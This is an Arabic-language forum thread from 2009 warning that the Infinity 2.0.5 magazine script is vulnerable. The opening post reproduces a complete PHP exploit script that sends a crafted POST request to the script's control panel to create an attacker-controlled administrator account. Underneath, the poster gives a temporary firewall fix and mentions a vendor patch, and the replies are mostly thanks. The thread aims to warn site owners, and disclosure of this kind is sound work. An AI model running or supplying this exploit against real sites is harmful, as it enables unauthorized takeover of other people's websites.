المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : [ ترقيع ] ثغرة بمجلة الانفنتي !


مخاوي الكيبورد
08-16-2009, 01:45 AM
http://milw0rm.com/exploits/9159
Infinity <= 2.0.5 Arbitrary Create Admin Exploit

<?php
print_r('
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_///_,
( : / (_) / ( .

___________________
_/QQQQQQQQQQQQQQQQQQQ\__
[q] Infinity <= 2.0.5 Create Admin __/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
[q] _POST <3 /QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
[q] Owned :) |QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
[/] -[WHAT?]- \QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
__________________________________________________ ____________________________
/ \
| :: Stupid vulnerability in a good script :( tsk tsk |
\_________________________________________________ _____________________________/
\ No More Private /
`````````````````
Sec-Code.com


USAGE: php whatever.php localhost /infinity/


');

ini_set("max_execution_time",0);

function QABANDI($victim,$vic_dir){
$host = $victim;
$p = "http://".$host.$vic_dir;




$data ="name=qabandi&password=qabandi&conf_password=qabandi&email= ( تم حذف البريد لأن عرضه مخالف لشروط المنتدى ) &nat=man&hoppy=QabandiWasHere&text=QabandiWasHere&country=1";
$packet ="POST ".$p."/cp/profile.php?action=donewauthor HTTP/1.0\r\n";
$packet.="****************************-Type: application/x-www-form-urlencoded\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
$packet.="Pragma: no-cache\r\n";
$packet.="****************************-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;



//print $packet;
$o = @fsockopen($host, 80);
if(!$o){
echo "\n[x] No response...\n";
die;
}

fputs($o, $packet);
while (!feof($o)) $data .= fread($o, 1024);
fclose($o);

$_404 = strstr( $data, "HTTP/1.1 404 Not Found" );
if ( !empty($_404) ){
echo "\n[x] 404 Not Found... Make sure of path. \n";
die;
}

$_401 = strstr( $data, "401 Authorization Required" );
if ( !empty($_401) ){
echo "\n[x] HTTP authentication detected! (mrakib jdar narry, maku faydeh) \n";
die;
}

echo "Admin created !\n\nUsername: qabandi\npassword: qabandi";

}

$host1 = $argv[1];
$userdir1=$argv[2];
QABANDI($host1,$userdir1);

die;


?>
حياكم الله ..
ثغرة نزلت بتاريخ 2009-07-15 وللاسف فيه مواقع عربية مصابة للحين ..
خطورة الثغرة : عرض password & user الادمن
ترقيع الثغرة المؤقت : وضع جدار ناري على لوحة تحكم السكربت
فـ بالتالي ماراح يشتغل اكسبلويت الثغرة اللي فوق وماراح تعطي اي نتيجة
الله يحفظكمـ انتمـ ومواقع المسلمين ..
مكتشف الثغرة واحد من الاصدقاء
./ مخاوي الكيبورد

مشعل الليل
08-16-2009, 02:57 AM
شكرا على التنبيه بارك فيك اخي

نورالدنيا
08-16-2009, 03:46 AM
:h73::h73:
الله يكفينا شرها

ومشكور اخوي على التنبيه
http://www.b3b7.com/vb/imgcache/20300.imgcache.png

الخريصي
08-16-2009, 04:40 AM
:xx:شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

محبة الجنه
08-16-2009, 05:46 AM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

شموخ المحبة
08-16-2009, 12:29 PM
مشكورة الله يعطيك العافية

مناهي
08-16-2009, 05:21 PM
الله يستر
مخاوي الكيبورد
مشكور على التنبية
والله يعطيكـ العافية

الاخينع
08-17-2009, 03:53 AM
لازم الاخذ بالحيطه والحذرتقبل مروري مع كل تقدير واحترام لشخصكم الكريم:xx:

جـــود
08-17-2009, 06:30 AM
مخاوي الكيبورد

الله يكفينا شرها

مشكووور على التنبيه

جود

طروادا
08-17-2009, 07:55 AM
استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
:xx:دمت مبدعاً استاذ مخاوي:xx:

مخاوي الكيبورد
08-17-2009, 08:52 AM
استاذ مخاوي انت تقول (ترقيع الثغرة المؤقت )ماهو الحل المناسب برائيك للمشكله ؟؟؟
هل يتطلب نقل الموقع الى سير فر اخر اكثر حمايه ؟؟
وياليت نسمع رد الاخوان بالدعم الفني بمنتدى بعد حيي حول هذي المشكله
:xx:دمت مبدعاً استاذ مخاوي:xx:
اهلين بالحبيب ..
اقصد بالترقيع الموقت حل مبدئ للثغرة من نظري يكون سهل على كل مستخدمين المجله
السيرفر ماله اي دخل لو نقلت الموقع المصاب على اقوى سيرفر بالعالم راح يضل مصاب
لان الثغرة بملفات الموقع ماهي بالسيرفر ..
طبعا شركة ابعاد المعلومات منتجة مجلة انفنتي اخبرها طرحت اكواد برمجيها ( ترقيع ) للملف المصاب بالسكربت
على مايقولون كل الطرق تودئ الى روما ( جدار ناري او ترقيع برمجي ) كلها تمنع تطبيق الثغرة اعلاه ..
نورت

الـ ساري
08-18-2009, 04:45 PM
بارك فيك ورعاك وحفظك الله على التحذير
الذي عانينا منه
بيوم من الايام
اشكرك وفقك الله ودمت لنا غالينا

ياسر العلهوب
08-18-2009, 10:56 PM
شكرا على التنبيه بارك فيك اخي

تنوره
08-20-2009, 04:09 AM
:xx:موفق بإذن الله ... لك مني أجمل تحية .

حايليه
08-21-2009, 01:54 AM
تسلم ومشكور اخوي على التنبيه

هـــايـــدي
08-22-2009, 04:11 AM
مخاوي الكيبورد ،،
الله يعطيك العافية ،،
والله يجيرنا من هدولي آصحاب الثغرات :mad:،،

مزٱجـے
11-01-2009, 03:34 PM
شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

موووادع
11-01-2009, 09:11 PM
الله يــ ع ـــطيك الف ع ـــافيه


وتسلم أخوي على التنويه


والله لايحرمنا منك ومن ابداعدك ومواهبك المثمرة